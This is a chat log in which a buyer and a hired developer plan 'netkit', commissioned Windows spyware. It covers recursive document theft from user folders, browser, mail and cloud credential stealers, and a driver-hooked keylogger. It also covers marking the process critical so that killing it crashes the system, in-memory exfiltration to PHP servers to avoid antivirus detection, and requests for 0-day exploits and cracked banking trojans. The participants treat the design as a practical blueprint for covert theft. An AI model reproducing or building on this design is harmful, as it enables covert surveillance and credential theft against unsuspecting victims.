  717. [12/2/2012 4:19:31 PM] Shelly Bongo: look in the txt
  718. [12/2/2012 4:19:45 PM] Shelly Bongo: - each cycle netkit will start by scanning the Recently Opened Documents folder (http://stackoverflow.com/questions/1287092/get-recent-documents-folder-in-net) - finding files that were not yet sent (or have been updated since being sent - their modification timestamp is different than that of the file that was sent - and are eligible to be resent) - starting from the most recently accessed file to the last
  719.   - in case there are no longer any documents in the recent-docs folder that can be sent, netkit shall scan other folders recursively according to a predefined list in the source code, the list (after Recent Documents) should be (taken from: http://msdn.microsoft.com/en-us/library/system.environment.specialfolder(v=vs.80).aspx): Desktop, MyDocuments
  720. [12/2/2012 4:20:02 PM] Shelly Bongo: start from Recent Documents, then go to a list of other directories: Desktop, then MyDocuments
  721. [12/2/2012 4:20:41 PM] ' Tweety HF;: So 3 locations only?
  722. [12/2/2012 4:21:38 PM] Shelly Bongo: yes
  723. [12/2/2012 4:22:12 PM] ' Tweety HF;: Does this include sub folders?
  724. [12/2/2012 4:22:14 PM] Shelly Bongo: in the future maybe do the whole HDD - the issue is, that the whole HDD will be noticeable
  725. [12/2/2012 4:22:19 PM] Shelly Bongo: yes, recursively
  726. [12/2/2012 4:22:23 PM] Shelly Bongo: including subfolders
  727. [12/2/2012 4:22:29 PM] Shelly Bongo: but NOT including links (don't follow links)
  728. [12/2/2012 4:23:06 PM] ' Tweety HF;: Links? You mean short cuts? And the whole HDD will be a bad idea, if they have 50 GB worth of data then it will upload it all onto your hosting..
  729. [12/2/2012 4:23:54 PM] Shelly Bongo: yes i mean don't follow short cuts
  730. [12/2/2012 4:24:01 PM] Shelly Bongo: sorry but did you read the txt?
  731. [12/2/2012 4:24:07 PM] ' Tweety HF;: Yeah I did
  732. [12/2/2012 4:24:15 PM] Shelly Bongo: okay
  733. [12/2/2012 4:24:25 PM] Shelly Bongo: even if we do the whole HDD - it won't send everything
  734. [12/2/2012 4:24:27 PM] Shelly Bongo: only matching files
  735. [12/2/2012 4:24:32 PM] ' Tweety HF;: Ok.
  736. [12/2/2012 4:24:37 PM] Shelly Bongo: - the conditions to determine if a file is to be sent:
  737.   - its filename matches one of the predefined regular expression patterns in the source - the default pattern list should contain two items: .doc & .xls
  738.   - it is not larger than FILER_MAX_FILESIZE bytes (default: 10 megabytes)
  739.   - it has not been sent before (or has been sent but with a different "last modified" timestamp)
  740. [12/2/2012 4:24:41 PM] Shelly Bongo: from the txt
  741. [12/2/2012 4:25:12 PM] ' Tweety HF;: Ok there's 2 ways to do the last bit
  742. [12/2/2012 4:25:37 PM] ' Tweety HF;: 1 way is to write the sent files into a text file and encrypt + hide it.
  743. [12/2/2012 4:26:00 PM] ' Tweety HF;: second way is to write to the EOF of the file, it won't be noticeable at all and nobody will know.
  744. [12/2/2012 4:26:33 PM] Shelly Bongo: writing to the EOF can screw up some filetypes, and it changes the mtime timestamp
  745. [12/2/2012 4:26:38 PM] Shelly Bongo: so lets go with #1
  746. [12/2/2012 4:28:58 PM] ' Tweety HF;: It doesn't change the file type at all and changing the timestamp is irrelevant
  747. [12/2/2012 4:29:23 PM] Shelly Bongo: what do you mean? if a user has a .docx file
  748. [12/2/2012 4:29:36 PM] Shelly Bongo: and you start writing to the end of that file, it can become corrupt
  749. [12/2/2012 4:29:45 PM] Shelly Bongo: the user can receive warnings/errors when opening the file
  750. [12/2/2012 4:29:50 PM] Shelly Bongo: after it was altered by netkit
  751. [12/2/2012 4:30:04 PM] ' Tweety HF;: it doesn't affect the file, it doesn't corrupt.
  752. [12/2/2012 4:30:50 PM] Shelly Bongo: what if it's an avi file?
  753. [12/2/2012 4:30:56 PM] Shelly Bongo: what if it's jpeg?
  754. [12/2/2012 4:31:00 PM] ' Tweety HF;: No problem.
  755. [12/2/2012 4:31:01 PM] Shelly Bongo: can you guarantee it'll never corrupt?
  756. [12/2/2012 4:31:02 PM] ' Tweety HF;: Nothing will happen.
  757. [12/2/2012 4:31:04 PM] ' Tweety HF;: Yes.
  758. [12/2/2012 4:31:05 PM] Shelly Bongo: for all file types?
  759. [12/2/2012 4:31:10 PM] ' Tweety HF;: yup.
  760. [12/2/2012 4:35:39 PM] *** Shelly Bongo sent test-image.png ***
  761. [12/2/2012 4:35:55 PM] Shelly Bongo: please insert the text 'netkit' to the EOF of this file, without corrupting it
  762. [12/2/2012 4:36:02 PM] Shelly Bongo: here, it got corrupted
  763. [12/2/2012 4:36:30 PM] ' Tweety HF;: sec
  764. [12/2/2012 4:37:03 PM] Shelly Bongo: i want this feature to be generic - so if i'll want to add support for another filetype in the future, it should work without corruption
  765. [12/2/2012 4:38:40 PM] Shelly Bongo: forget the image, lets please do option #1
  766. [12/2/2012 4:40:04 PM] Shelly Bongo: by the way, you got the part regarding the modification time, right? so if the same file is sent, but later updated on the filesystem, it should be sent again - however if the modification time is the same as was already sent, it shouldn't
  767. [12/2/2012 4:40:16 PM] *** ' Tweety HF; sent test-image.png ***
  768. [12/2/2012 4:40:28 PM] ' Tweety HF;: written.
  769. [12/2/2012 4:41:26 PM] ' Tweety HF;: Open it with Notepad++ or something
  770. [12/2/2012 4:41:32 PM] ' Tweety HF;: you can see the EOF written.
  771. [12/2/2012 4:41:39 PM] Shelly Bongo: i saw it
  772. [12/2/2012 4:41:49 PM] Shelly Bongo: i still prefer option #1, it's more generic
  773. [12/2/2012 4:42:08 PM] ' Tweety HF;: The best way for a virus to spread is without dropping files
  774. [12/2/2012 4:42:16 PM] ' Tweety HF;: more files being dropped = AV will be suspicious
  775. [12/2/2012 4:43:12 PM] ' Tweety HF;: The only time I drop a file is to install the virus and add the start up keys.
  776. [12/2/2012 4:50:36 PM] Shelly Bongo: what if i will want to send out a .txt file?
  777. [12/2/2012 4:50:53 PM] Shelly Bongo: the user will see it was modified when he opens it in notepad?
  778. [12/2/2012 4:51:53 PM] Shelly Bongo: if you guarantee it'll work for doc/docx/ppt/pptx/xls/xlsx/txt/pdf/rtf - then lets go for the stealthy EOF method, otherwise option 1
  779. [12/2/2012 4:55:24 PM] ' Tweety HF;: Sec just testing a few things
  780. [12/2/2012 4:56:21 PM] Shelly Bongo: i'll be back in around 7 hours
  781. [12/2/2012 4:58:40 PM] ' Tweety HF;: sure
  782. [12/2/2012 7:10:56 PM] Shelly Bongo: hi
  783. [12/2/2012 7:10:59 PM] Shelly Bongo: back
  784. [12/2/2012 7:11:25 PM] Shelly Bongo: i wanted to ask regarding the pass stealers, what's the status with IE? i saw that some loggers don't support it yet, is it a challenge?
  785. [12/2/2012 7:12:17 PM] ' Tweety HF;: it's not, it's just pointless because people don't use IE and if you want to steal the password still you need like 4-5 different versions based on the IE version
  786. [12/2/2012 7:12:23 PM] ' Tweety HF;: that increases the stub size by a lot
  787. [12/2/2012 7:14:30 PM] Shelly Bongo: "people don't use IE" is not a statement that reflects reality
  788. [12/2/2012 7:14:47 PM] Shelly Bongo: depends who your target is, and when you're not targeting tech-savvy people, they WILL use IE
  789. [12/2/2012 7:16:52 PM] Shelly Bongo: since IE 8-9-10 are the only relevant versions, you'd need 3 different versions for IE recovery at max
  790. [12/2/2012 7:22:13 PM] ' Tweety HF;: Alright I will whip up an IE module
  791. [12/2/2012 9:01:14 PM] Shelly Bongo: okay, so i think we have discussed most of the things needed for you to complete this, anyway i'm around (more or less) until you'll be done
  792. [12/2/2012 9:01:24 PM] ' Tweety HF;: Ok.
  793. [12/2/2012 9:01:35 PM] Shelly Bongo: which encryption do you plan on using? if possible AES 256 will be nice
  794. [12/2/2012 9:03:05 PM] Shelly Bongo: oh, and one more thing - and it's okay if you think it's out of scope of the project budget we agreed on - but if you can slip in credentials stealing for dropbox+googledrive+skydrive it'll be great
  795. [12/2/2012 9:03:28 PM] Shelly Bongo: i think that's it :)
  796. [12/2/2012 9:05:14 PM] ' Tweety HF;: Alright I will try throw them in
  797. [12/2/2012 9:05:18 PM] ' Tweety HF;: And AES 256 will be used.
  798. [12/3/2012 12:58:29 AM] Shelly Bongo: are you able to supply 0day vulnerabilities?
  799. [12/3/2012 12:58:51 AM] Shelly Bongo: for an unrelated project
  800. [12/3/2012 12:59:04 AM] ' Tweety HF;: I may be able to.
  801. [12/3/2012 12:59:51 AM] Shelly Bongo: hi
  802. [12/3/2012 1:01:35 AM] Shelly Bongo: that's vague
  803. [12/3/2012 1:01:45 AM] Shelly Bongo: IE, Acrobat...
  804. [12/3/2012 1:02:07 AM] Shelly Bongo: unpatched exploitable vulnerabilities
  805. [12/3/2012 1:02:22 AM] ' Tweety HF;: i'll see what i can do after this project
  806. [12/3/2012 1:02:23 AM] Shelly Bongo: vlc/media player
  807. [12/3/2012 1:02:35 AM] Shelly Bongo: okay
  808. [12/3/2012 1:09:29 AM] Shelly Bongo: hmmm
  809. [12/3/2012 1:09:46 AM] Shelly Bongo: i gave your test.log file another view just now
  810. [12/3/2012 1:09:57 AM] Shelly Bongo: and noticed... you neglected to remove a few passwords
  811. [12/3/2012 1:10:01 AM] Shelly Bongo: FYI
  812. [12/3/2012 1:38:21 AM] Shelly Bongo: don't worry, i won't use it, i really want nothing more than get the product :)
  813. [12/3/2012 1:42:08 AM] Shelly Bongo: the good part is, the chrome stealer works perfectly fine
  814. [12/3/2012 4:10:31 PM] Shelly Bongo: any updates?
  815. [12/3/2012 11:39:26 PM] Shelly Bongo: ?
  816. [12/3/2012 11:39:28 PM] Shelly Bongo: ??
  817. [12/4/2012 12:32:57 AM] Shelly Bongo: hi
  818. [12/4/2012 12:33:02 AM] ' Tweety HF;: hihi
  819. [12/4/2012 12:33:16 AM] Shelly Bongo: i thought you ran away with my $150 :)
  820. [12/4/2012 12:33:34 AM] ' Tweety HF;: no no no lol
  821. [12/4/2012 12:33:55 AM] ' Tweety HF;: My family went off on holiday and college has resumed so I will only be online 3-4 hours a day during the night.
  822. [12/4/2012 12:34:24 AM] Shelly Bongo: okay
  823. [12/4/2012 12:34:35 AM] Shelly Bongo: i do hope we will be on schedule
  824. [12/4/2012 12:34:44 AM] ' Tweety HF;: yes we will no worries
  825. [12/4/2012 12:34:50 AM] Shelly Bongo: great
  826. [12/4/2012 12:35:25 AM] Shelly Bongo: so where are we standing? what's left to do?
  827. [12/4/2012 12:35:37 AM] Shelly Bongo: would you say we're 50% done?
  828. [12/4/2012 12:35:45 AM] Shelly Bongo: s/we're/you're/
  829. [12/4/2012 12:36:20 AM] ' Tweety HF;: 80% done
  830. [12/4/2012 12:36:51 AM] ' Tweety HF;: only thing left is the file stealing module and adding the stealers in, stealers are done but just need to be integrated
  831. [12/4/2012 12:39:41 AM | Edited 12:39:50 AM] Shelly Bongo: okay, after reaching 100% R&D (the php too) there's also testing left with your AV VMs
  832. [12/4/2012 12:39:58 AM] ' Tweety HF;: Deadline was saturday or sunday?
  833. [12/4/2012 12:40:03 AM] Shelly Bongo: sunday
  834. [12/4/2012 12:40:06 AM] ' Tweety HF;: ok
  835. [12/4/2012 1:21:12 AM] Shelly Bongo: are you aware of any loggers for mac by any chance?
  836. [12/4/2012 1:21:17 AM] Shelly Bongo: do you code for mac?
  837. [12/4/2012 1:21:30 AM] ' Tweety HF;: i actually don't, sorry
  838. [12/4/2012 1:21:43 AM] Shelly Bongo: okay, it's not that important
  839. [12/4/2012 1:24:00 AM] Shelly Bongo: if i wish to find latest cracked spyeye, or citadel and such malware, what's a good site to look for this at? trojanforge, hf?
  840. [12/4/2012 1:24:21 AM] ' Tweety HF;: actually have no idea lol
  841. [12/4/2012 1:24:23 AM] ' Tweety HF;: trojanforge is good
  842. [12/4/2012 1:24:27 AM] ' Tweety HF;: and so is leakforums
  843. [12/4/2012 1:24:36 AM] Shelly Bongo: thanks, i'll see
  844. [12/5/2012 12:53:49 AM] Shelly Bongo: hey
  845. [12/5/2012 12:53:59 AM] Shelly Bongo: any updates?
  846. [12/5/2012 12:54:12 AM] ' Tweety HF;: Integrating some DLLs into it now :)
  847. [12/5/2012 1:00:19 AM] Shelly Bongo: why would it need DLLs?
  848. [12/5/2012 1:00:51 AM] ' Tweety HF;: I am making a C++ module for it to use
  849. [12/5/2012 1:00:58 AM] ' Tweety HF;: it will be more powerful and faster
  850. [12/5/2012 1:01:05 AM] ' Tweety HF;: the keylogger will be 10000x better lol
  851. [12/5/2012 1:02:54 AM] Shelly Bongo: is it too slow now?
  852. [12/5/2012 1:03:35 AM] ' Tweety HF;: Nope, not at all. But if it is in C++ it will be more powerful so no keys will be lost. That is my main goal.
  853. [12/5/2012 1:04:13 AM] Shelly Bongo: okay
  854. [12/5/2012 1:05:03 AM] ' Tweety HF;: That ok? I never planned to use C/C++ but I thought it will be better for you
  855. [12/5/2012 1:08:35 AM] Shelly Bongo: well one of the 3 features discussed is a keylogger
  856. [12/5/2012 1:08:56 AM] Shelly Bongo: so if you as the author feel like this is required to make it work well, it's your call
  857. [12/5/2012 1:09:14 AM] ' Tweety HF;: It is better for the application as it is 10000 x faster :)
  858. [12/5/2012 1:09:46 AM] Shelly Bongo: where is the keyboard hook installed to?
  859. [12/5/2012 1:10:01 AM] ' Tweety HF;: it hooks onto the keyboard driver
  860. [12/5/2012 1:10:16 AM] Shelly Bongo: and that doesn't require admin rights / uac?
  861. [12/5/2012 1:11:00 AM] ' Tweety HF;: nope
  862. [12/5/2012 1:17:18 AM] Shelly Bongo: interesting
  863. [12/5/2012 1:18:02 AM] ' Tweety HF;: Yup.
  864. [12/5/2012 1:18:03 AM] Shelly Bongo: so it hooks onto the driver, and proxies each key pressed onwards to its original keypress functions - while logging each key before forwarding it
  865. [12/5/2012 1:18:05 AM] Shelly Bongo: ?
  866. [12/5/2012 1:18:07 AM] ' Tweety HF;: Yes.
  867. [12/5/2012 1:18:27 AM] ' Tweety HF;: It's very powerful and because it's driver hooked it will be captured before being sent to explorer.exe to be processed
  868. [12/5/2012 1:18:38 AM] ' Tweety HF;: meaning it bypasses all key scramblers
  869. [12/5/2012 1:19:19 AM] Shelly Bongo: if that's the case - then even if it's written in .net, and is slow - since it works as a proxy - it should never 'lose keys' - the worst case would be, it'd make things slow
  870. [12/5/2012 1:19:22 AM] Shelly Bongo: am i not correct?
  871. [12/5/2012 1:20:46 AM] ' Tweety HF;: it won't be slow at all.
  872. [12/6/2012 12:46:21 AM] Shelly Bongo: hi
  873. [12/6/2012 12:46:28 AM] ' Tweety HF;: Hello
  874. [12/6/2012 12:47:35 AM] Shelly Bongo: is it complex to make a builder for this tool? (e.g. loader, where you configure settings and it produces a ready-made exe, like some keyloggers have)
  875. [12/6/2012 12:47:45 AM] Shelly Bongo: i don't need it now, just wondering
  876. [12/6/2012 12:47:57 AM] Shelly Bongo: it seems like a huge complicated thing to me, since it's like writing your own compiler or something
  877. [12/6/2012 12:48:00 AM] Shelly Bongo: but i might be mistaken
  878. [12/6/2012 12:49:22 AM] ' Tweety HF;: No worries! I can make a builder if you'd like. But if it's the source or doing configurations you're worried about i can make a text file for you to write them in and then compile using visual studio normally
  879. [12/6/2012 12:49:24 AM] ' Tweety HF;: or we can have builder.
  880. [12/6/2012 12:50:16 AM] Shelly Bongo: for this time i prefer the source code, i hope it has comments and is ordered
  881. [12/6/2012 12:50:26 AM] Shelly Bongo: i was just curious about 'builders'
  882. [12/6/2012 12:50:41 AM] Shelly Bongo: after this version is complete - i might want it as part of another project from you
  883. [12/6/2012 12:50:41 AM] ' Tweety HF;: it's not commented, but my source is extremely clean
  884. [12/6/2012 12:50:47 AM] ' Tweety HF;: no problem
  885. [12/6/2012 12:50:51 AM] ' Tweety HF;: do you want to look at the current code?
  886. [12/6/2012 12:50:53 AM] Shelly Bongo: (including other features/improvements)
  887. [12/6/2012 12:51:00 AM] Shelly Bongo: i'd love to
  888. [12/6/2012 12:51:02 AM] Shelly Bongo: TV?
  889. [12/6/2012 12:51:12 AM] ' Tweety HF;: Yes
  890. [12/6/2012 12:51:38 AM] ' Tweety HF;: 234 791 527
  891. [12/6/2012 12:51:40 AM] ' Tweety HF;: 3439
  892. [12/6/2012 12:52:35 AM] Shelly Bongo: oh it's in vb
  893. [12/6/2012 12:52:38 AM] Shelly Bongo: i thought it'll be in C#
  894. [12/6/2012 12:52:46 AM] ' Tweety HF;: I prefer writing in VB
  895. [12/6/2012 12:52:50 AM] ' Tweety HF;: You can convert it though
  896. [12/6/2012 12:52:58 AM] Shelly Bongo: okay
  897. [12/6/2012 12:53:02 AM] ' Tweety HF;: But it won't make a single difference
  898. [12/6/2012 12:53:07 AM] ' Tweety HF;: they both compile into MSIL code
  899. [12/6/2012 12:53:18 AM] Shelly Bongo: okay, it's not very important so long as it works well :)
  900. [12/6/2012 12:54:26 AM] Shelly Bongo: can you show the netkit file again, the beginning?
  901. [12/6/2012 12:54:27 AM] ' Tweety HF;: Will have it ready for sunday
  902. [12/6/2012 12:54:50 AM] Shelly Bongo: okay
  903. [12/6/2012 12:54:55 AM] ' Tweety HF;: look
  904. [12/6/2012 12:55:22 AM] ' Tweety HF;: nvm
  905. [12/6/2012 12:55:25 AM] ' Tweety HF;: it will BSOD me lol..
  906. [12/6/2012 12:55:33 AM] Shelly Bongo: why?
  907. [12/6/2012 12:55:35 AM] Shelly Bongo: that's a big bug :)
  908. [12/6/2012 12:55:41 AM] ' Tweety HF;: not a bug at all
  909. [12/6/2012 12:55:42 AM] Shelly Bongo: don't want my "clients" bsod'ing
  910. [12/6/2012 12:55:47 AM] Shelly Bongo: okay
  911. [12/6/2012 12:56:03 AM] ' Tweety HF;: If they are not admin then they will get a message saying "access is denied, this is required for the system to run"
  912. [12/6/2012 12:56:11 AM] ' Tweety HF;: same as svchost.exe etc
  913. [12/6/2012 12:56:12 AM] Shelly Bongo: what?!
  914. [12/6/2012 12:56:14 AM] ' Tweety HF;: they all have that
  915. [12/6/2012 12:56:21 AM] ' Tweety HF;: all system processes have that
  916. [12/6/2012 12:56:24 AM] Shelly Bongo: i have other loggers which i bought, none of them does it
  917. [12/6/2012 12:56:33 AM] ' Tweety HF;: because this is process protection
  918. [12/6/2012 12:56:51 AM] Shelly Bongo: but me and you discussed that stealth is 1st priority, no messages
  919. [12/6/2012 12:56:58 AM] ' Tweety HF;: have you ever tried killing the process svchost.exe? services.exe? system?
  920. [12/6/2012 12:57:03 AM] ' Tweety HF;: this is tealth lol
  921. [12/6/2012 12:57:06 AM] ' Tweety HF;: stealth
  922. [12/6/2012 12:57:14 AM] ' Tweety HF;: critical processes = error messages
  923. [12/6/2012 12:57:18 AM] ' Tweety HF;: didn't you know that?
  924. [12/6/2012 12:57:21 AM] Shelly Bongo: sorry maybe i misunderstood - when did you say we'll get an error message?
  925. [12/6/2012 12:57:27 AM] ' Tweety HF;: look
  926. [12/6/2012 12:57:28 AM] Shelly Bongo: when a user tries to kill the process?
  927. [12/6/2012 12:57:53 AM] Shelly Bongo: oh okay!
  928. [12/6/2012 12:57:56 AM] ' Tweety HF;: Sometimes I need to kill a process which is giving me "Access denied" when trying to use the task manager or Process Explorer to kill. I am using Windows 7 64bit. I need to be able to kill such a process no matter what. It's not a Windows executable. Is there a "God" tool which I can use to override the kill protection?
  929. [12/6/2012 12:58:07 AM] ' Tweety HF;: you're not allowed to kill critical processes
  930. [12/6/2012 12:58:09 AM] Shelly Bongo: i thought you meant - that when a non-admin user runs netkit they'll get the message
  931. [12/6/2012 12:58:17 AM] ' Tweety HF;: noooooooooo
  932. [12/6/2012 12:58:17 AM] Shelly Bongo: not when they try to kill the proc :)
  933. [12/6/2012 12:58:19 AM] ' Tweety HF;: lol
  934. [12/6/2012 12:58:27 AM] ' Tweety HF;: when they try to kill it, it will say critical process
  935. [12/6/2012 12:58:31 AM] Shelly Bongo: cool
  936. [12/6/2012 12:58:34 AM] ' Tweety HF;: when admin tries to kill it they will get BSOD
  937. [12/6/2012 12:58:40 AM] ' Tweety HF;: they will think it's a critical process
  938. [12/6/2012 12:58:43 AM] ' Tweety HF;: so they won't do it again
  939. [12/6/2012 12:59:03 AM] Shelly Bongo: yes, i understand what you mean now
  940. [12/6/2012 12:59:06 AM] ' Tweety HF;: ever tried killing system? it gives 15 seconds before it closes
  941. [12/6/2012 12:59:06 AM] ' Tweety HF;: :P
  942. [12/6/2012 12:59:13 AM] ' Tweety HF;: that's the netkit rooting system
  943. [12/6/2012 12:59:17 AM] Shelly Bongo: very nice
  944. [12/6/2012 12:59:27 AM] ' Tweety HF;: Very powerful too :)
  945. [12/6/2012 12:59:55 AM] Shelly Bongo: looking at the code - it seems like you have a lot left - many more stealers, the file leaker code (which i think is a 'big one')... and the delivery code to the php (and the php itself)
  946. [12/6/2012 1:00:04 AM] Shelly Bongo: are you sure you'll be able to provide it on time?
  947. [12/6/2012 1:00:17 AM] ' Tweety HF;: Of course.
  948. [12/6/2012 1:00:32 AM] ' Tweety HF;: I have the PHP files written on my phone as I do them while in college/work
  949. [12/6/2012 1:00:36 AM] ' Tweety HF;: So it's all ready
  950. [12/6/2012 1:00:46 AM] ' Tweety HF;: file stealer is something I will work on tomorrow all day
  951. [12/6/2012 1:01:02 AM] ' Tweety HF;: stealers like outlook + thunderbird and messaging systems will be done tonight.
  952. [12/6/2012 1:01:07 AM] ' Tweety HF;: Everything is going smoothly.
  953. [12/6/2012 1:01:15 AM] Shelly Bongo: okay
  954. [12/6/2012 1:01:23 AM] ' Tweety HF;: output file:
  955. [12/6/2012 1:01:40 AM] ' Tweety HF;: currently 53 KB
  956. [12/6/2012 1:01:45 AM] ' Tweety HF;: max it will be is around 100 KB
  957. [12/6/2012 1:01:50 AM] ' Tweety HF;: is that fine with you or too big?
  958. [12/6/2012 1:01:58 AM] Shelly Bongo: that's perfect
  959. [12/6/2012 1:02:01 AM] ' Tweety HF;: Ok
  960. [12/6/2012 1:02:12 AM] Shelly Bongo: so the keyboard part is 100% done?
  961. [12/6/2012 1:02:17 AM] ' Tweety HF;: Yes.
  962. [12/6/2012 1:02:21 AM] Shelly Bongo: where does it store the logs?
  963. [12/6/2012 1:02:21 AM] ' Tweety HF;: Also
  964. [12/6/2012 1:02:31 AM] ' Tweety HF;: It will keep the files in memory
  965. [12/6/2012 1:02:37 AM] ' Tweety HF;: Everything will be done in memory
  966. [12/6/2012 1:02:43 AM] ' Tweety HF;: zip and password protect ALL files
  967. [12/6/2012 1:02:49 AM] ' Tweety HF;: in memory
  968. [12/6/2012 1:02:56 AM] ' Tweety HF;: then from a memory stream it will write to the php files
  969. [12/6/2012 1:02:59 AM] ' Tweety HF;: 100% stealth
  970. [12/6/2012 1:03:04 AM] ' Tweety HF;: no dropping
  971. [12/6/2012 1:03:06 AM] ' Tweety HF;: no evidence
  972. [12/6/2012 1:03:11 AM] Shelly Bongo: on the other hand it does not support offline logging
  973. [12/6/2012 1:03:12 AM] ' Tweety HF;: is that ok?
  974. [12/6/2012 1:03:18 AM] ' Tweety HF;: Yes it will
  975. [12/6/2012 1:03:32 AM] Shelly Bongo: you mean because it will eventually get sent out when it's back online?
  976. [12/6/2012 1:03:37 AM] ' Tweety HF;: It will store every zip file in memory until internet connection is found
  977. [12/6/2012 1:04:02 AM] ' Tweety HF;: Priorities are Stealth, Transfer and anonymity
  978. [12/6/2012 1:04:19 AM] ' Tweety HF;: Everything will be made sure to have all encrypted traffic hidden
  979. [12/6/2012 1:04:37 AM] ' Tweety HF;: I hope I am working at the standards you expect, is there anything else you require?
  980. [12/6/2012 1:05:08 AM] Shelly Bongo: i think there are some places where you were given 'creative freedom' here, and so far i like the directions you took
  981. [12/6/2012 1:05:39 AM] ' Tweety HF;: I appreciate that :)
  982. [12/6/2012 1:05:45 AM] Shelly Bongo: perhaps i'll have more comments about things like the transfer of files, etc. - when i see how it works
  983. [12/6/2012 1:05:51 AM] ' Tweety HF;: Sure.
  984. [12/6/2012 1:05:58 AM] Shelly Bongo: perhaps some tweaks on the php side (e.g. unzip all zipped content)
  985. [12/6/2012 1:06:06 AM] Shelly Bongo: send a php message upon installation
  986. [12/6/2012 1:06:06 AM] ' Tweety HF;: I will try to finish by saturday and finish all tests so you can have some last minute changes.
  987. [12/6/2012 1:06:14 AM] Shelly Bongo: upon "isdebugpresent()" etc
  988. [12/6/2012 1:06:20 AM] Shelly Bongo: great
  989. [12/6/2012 1:06:21 AM] ' Tweety HF;: I see, I can do that
  990. [12/6/2012 1:06:33 AM] ' Tweety HF;: Anything else?
  991. [12/6/2012 1:06:48 AM] Shelly Bongo: i think that's it so far, thanks for showing me your progress
  992. [12/6/2012 1:07:01 AM] ' Tweety HF;: No problem.
  993. [12/6/2012 1:07:57 AM] Shelly Bongo: do you mind giving me a short brief on how a builder is built? i mean, does it contain a VB compiler, that compiles the output exe? it sounds so complicated to me and you say it's a basic thing
  994. [12/6/2012 1:08:15 AM] Shelly Bongo: or point me to a good reading direction on the subject
  995. [12/6/2012 1:09:58 AM] ' Tweety HF;: The stub (Actual virus source) will have parameters set, and will be a text file. The builder edits the parameters to the users choices (like email and password for keyloggers) and then runs the source code into VBC.EXE (this is the main compiler that VB.NET uses) and it will compile the text file into the source code
  996. [12/6/2012 1:10:07 AM] ' Tweety HF;: the builder just replaces the parameters
  997. [12/6/2012 1:10:18 AM] ' Tweety HF;: in the source you will have email = ("[EMAILHERE]")
  998. [12/6/2012 1:10:27 AM] ' Tweety HF;: the builder will find that text, replace it with fkjdnfkjn@hotmail.com
  999. [12/6/2012 1:10:41 AM] Shelly Bongo: if that's how it works - whenever somebody sells a keylogger with builder, in fact the customers also have the full source code?
  1000. [12/6/2012 1:10:52 AM] Shelly Bongo: (sounds scary, from the author's perspective)
  1001. [12/6/2012 1:11:12 AM] ' Tweety HF;: yes they do
  1002. [12/6/2012 1:11:16 AM] ' Tweety HF;: but i'm smart, i have a cloud stub
  1003. [12/6/2012 1:11:32 AM] ' Tweety HF;: and the stub will not be present, the whole thing is written in the source
  1004. [12/6/2012 1:11:42 AM] ' Tweety HF;: like the builder WRITES the source code itself
  1005. [12/6/2012 1:11:44 AM] ' Tweety HF;: hehe
  1006. [12/6/2012 1:12:03 AM] ' Tweety HF;: look
  1007. [12/6/2012 1:12:03 AM] Shelly Bongo: in my project you are selling the source anyway so it's irrelevant
  1008. [12/6/2012 1:12:07 AM] Shelly Bongo: but still it's interesting
  1009. [12/6/2012 1:12:19 AM] Shelly Bongo: you know - i bought a keylogger, and when i open it in notepad++
  1010. [12/6/2012 1:12:26 AM] Shelly Bongo: i can see text of VB source code of stealers :)
  1011. [12/6/2012 1:12:36 AM] Shelly Bongo: (when i open the builder)
  1012. [12/6/2012 1:13:24 AM] ' Tweety HF;: yes but i will hide everything hehe
  1013. [12/6/2012 1:13:49 AM] Shelly Bongo: when? what do you mean?
  1014. [12/6/2012 1:14:06 AM] Shelly Bongo: to be clear - the deliverables of this project include full source code and everything
  1015. [12/6/2012 1:14:11 AM] Shelly Bongo: correct?
  1016. [12/6/2012 1:14:21 AM] *** ' Tweety HF; sent source.txt ***
  1017. [12/6/2012 1:14:30 AM] ' Tweety HF;: Yes
  1018. [12/6/2012 1:14:30 AM] ' Tweety HF;: Sec.
  1019. [12/6/2012 1:15:02 AM] Shelly Bongo: i will have the rest of the money ready for transfer on saturday
  1020. [12/6/2012 1:15:36 AM] ' Tweety HF;: Ok
  1021. [12/6/2012 1:15:38 AM] ' Tweety HF;: And try this
  1022. [12/6/2012 1:15:54 AM] *** ' Tweety HF; sent source.txt ***
  1023. [12/6/2012 1:16:04 AM] ' Tweety HF;: Take a look inside the text file, then save it on your desktop
  1024. [12/6/2012 1:16:08 AM] ' Tweety HF;: What does the content say?
  1025. [12/6/2012 1:16:36 AM] Shelly Bongo: Module testApp
  1026. sub main()
  1027. msgbox("CodeDOM is working with VBC.EXE!")
  1028. end sub
  1029.  
  1030. end module
  1031. [12/6/2012 1:16:40 AM] ' Tweety HF;: Yes
  1032. [12/6/2012 1:16:49 AM] ' Tweety HF;: Now open this Folder: C:\Windows\Microsoft.NET\Framework\v2.0.50727
  1033. [12/6/2012 1:17:00 AM] ' Tweety HF;: Opened?
  1034. [12/6/2012 1:17:08 AM] Shelly Bongo: yes
  1035. [12/6/2012 1:17:10 AM] Shelly Bongo: i see vbc
  1036. [12/6/2012 1:17:21 AM] ' Tweety HF;: DRAG and DROP the source.txt file into VBC.EXE
  1037. [12/6/2012 1:17:30 AM] ' Tweety HF;: Done?
  1038. [12/6/2012 1:17:39 AM] Shelly Bongo: yes, understood
  1039. [12/6/2012 1:17:40 AM] Shelly Bongo: :)
  1040. [12/6/2012 1:17:42 AM] Shelly Bongo: thanks
  1041. [12/6/2012 1:17:44 AM] ' Tweety HF;: Check your desktop
  1042. [12/6/2012 1:17:45 AM] Shelly Bongo: very cool
  1043. [12/6/2012 1:17:45 AM] ' Tweety HF;: :P
  1044. [12/6/2012 1:17:50 AM] ' Tweety HF;: This is what the builder does
  1045. [12/6/2012 1:17:53 AM] Shelly Bongo: this is just for VB though?
  1046. [12/6/2012 1:18:00 AM] Shelly Bongo: i mean, vbc.exe doesn't compile c#?
  1047. [12/6/2012 1:18:23 AM] ' Tweety HF;: same thing is used for C#
  1048. [12/6/2012 1:18:25 AM] ' Tweety HF;: CBC.exe
  1049. [12/6/2012 1:18:34 AM] ' Tweety HF;: CSC*
  1050. [12/6/2012 1:18:41 AM] Shelly Bongo: oh
  1051. [12/6/2012 1:18:43 AM] Shelly Bongo: very interesting
  1052. [12/6/2012 1:18:59 AM] ' Tweety HF;: I also wrote a .NET file infector lol
  1053. [12/6/2012 1:19:12 AM] ' Tweety HF;: It uses CodeDOM and injects MSIL code into an assembly
  1054. [12/6/2012 1:19:16 AM] Shelly Bongo: do you mind me asking if you're above 30 or below?
  1055. [12/6/2012 1:19:21 AM] ' Tweety HF;: I'm 18.
  1056. [12/6/2012 1:19:29 AM] Shelly Bongo: i'm just curious because you seem to know a lot about this
  1057. [12/6/2012 1:19:34 AM] Shelly Bongo: seriously?
